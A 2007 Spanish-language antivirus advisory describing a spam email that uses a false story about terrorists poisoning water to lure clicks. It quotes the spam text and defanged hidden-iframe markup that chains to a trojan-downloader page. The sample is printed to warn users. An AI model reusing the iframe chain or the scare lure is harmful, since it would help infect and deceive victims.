Esta página es un servicio gratuito de Video Soft BBS - SUBSCRIBASE en nuestras listas de correo.
 

Busque su tema:

VSantivirus  Internet
Proporcionado por FreeFind

Video Soft BBS
Menú Principal
Anti Trojans
Antivirus
Hoaxes
Subscripciones
Otro software
Artículos
Links
Sugerencias
Sobre el BBS
Direcciones
Galería
Chat

       

Mensaje de "virus terrorista", propaga un troyano
 
VSantivirus No 2415 Año 11, viernes 6 de abril de 2007

Mensaje de "virus terrorista", propaga un troyano
http://www.vsantivirus.com/05-04-07.htm

Por Jose Luis Lopez (*)
videosoft@videosoft.net.uy


En las últimas horas se ha estado propagando en forma de spam, un mensaje con una noticia falsa (ESPANA VIRUS TERRORISTA EN AGUA POTABLE), pero que puede generar la suficiente curiosidad en los navegantes como para que los mismos terminen haciendo clic en el enlace mostrado.

El texto de la versión más reciente del mencionado mensaje es el siguiente:

De: [una dirección falsa]

Asunto: ESPANA VIRUS TERRORISTA EN AGUA POTABLE

Texto del mensaje:

Virus Intoxica Agua potable en Espana, informamos
a los ciudadanos que no consuman agua ya que contiene
un virus debido a un acto terrorista.
Al momento no sabemos la gravedad del Incidente, si
sabemos que hay infectados por tomar AGUA INFECTADA
CON VIRUS !!
PARA MAS INFORMACION HAGA CLICK EN EL LINK .

http: // geocities.com/[nombre al azar]

Atte.
Ciudadania del Pueblo
Grupo Santander

------------------------------------------------------
Si recibio este mail por equivocacione, por favor
desuscribirse desde el siguiente link
unsubscribe from our mailing list:
http: // geocities.com/[nombre al azar]

Donde [nombre al azar] es una serie de caracteres y números generados al azar. El enlace suele ser siempre diferente.

Si el usuario hace clic en dicho enlace, se abre una página de Geocities conteniendo un iFrame oculto:

<iframe style='visibility: hidden;' width='1' height='1'
src='http: // 58.65.???.106 /1/'></iframe>

La dirección IP (apunta a un equipo ubicado en alguna parte de Hong Kong), contiene a su vez otra página que muestra un mensaje de error falso en su título (500 - Internal Server Error), y sin texto visible. Sin embargo, la página posee un segundo iFrame también oculto, dirigido a una segunda página en dicho servidor, la cuál contiene un código en JavaScript, que desde la base 2170 es detectado por NOD32 como JS/TrojanDownloader.Agent.EE:

<HTML><HEAD>
<TITLE>500 - Internal Server Error</TITLE></HEAD>
<BODY>
</TBODY>
<iFRAME NAME="member" width=0% height=0% scrolling="auto"
SRC="http: // 58.65.???.106 /1/ inde??.php">
</BODY></HTML>

La ejecución de JS/TrojanDownloader.Agent.EE se realiza de forma automática, culminando el proceso que se inició cuando el usuario hizo clic en el primer enlace recibido en el spam antes mencionado.

Si se vuelve a hacer clic sobre el enlace, el sitio rechaza la petición, basado en la dirección IP del usuario, lo que supone que no solo se utiliza un control para evitar una nueva infección, sino que se colecciona la lista de direcciones IP de las víctimas. El mensaje mostrado en ese caso es el siguiente:

Sorry! You IP is blocked.

Si bien lo aquí descrito puede servir de advertencia, recordemos que los escenarios involucrados en este tipo de ataque (textos de los mensajes, enlaces y páginas web, troyanos descargados, etc.), pueden variar fácilmente, y de hecho seguramente lo harán en el transcurso de las próximas horas.

Una vez más, recordamos que la curiosidad siempre juega en nuestra contra, y que hoy más que nunca es imprescindible no hacer clic sobre enlaces de ningún correo que no hayamos solicitado, así como tampoco abrir adjuntos que no hemos pedido, sin que en ningún caso importe en absoluto su remitente.

Por supuesto, esa conducta debe estar complementada con la norma de utilizar siempre un antivirus actualizado, y haber instalado todos los parches publicados por los fabricantes para nuestro sistema operativo y programas utilizados.


Relacionados:

TrojanDownloader.Agent.EE. Descarga otros troyanos
http://www.vsantivirus.com/trojandownloader-agent-ee.htm


(*) Jose Luis Lopez es el responsable de contenidos de VSAntivirus.com, y director ejecutivo de ESET NOD32 Uruguay.






(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com

 

Copyright 1996-2007 Video Soft BBS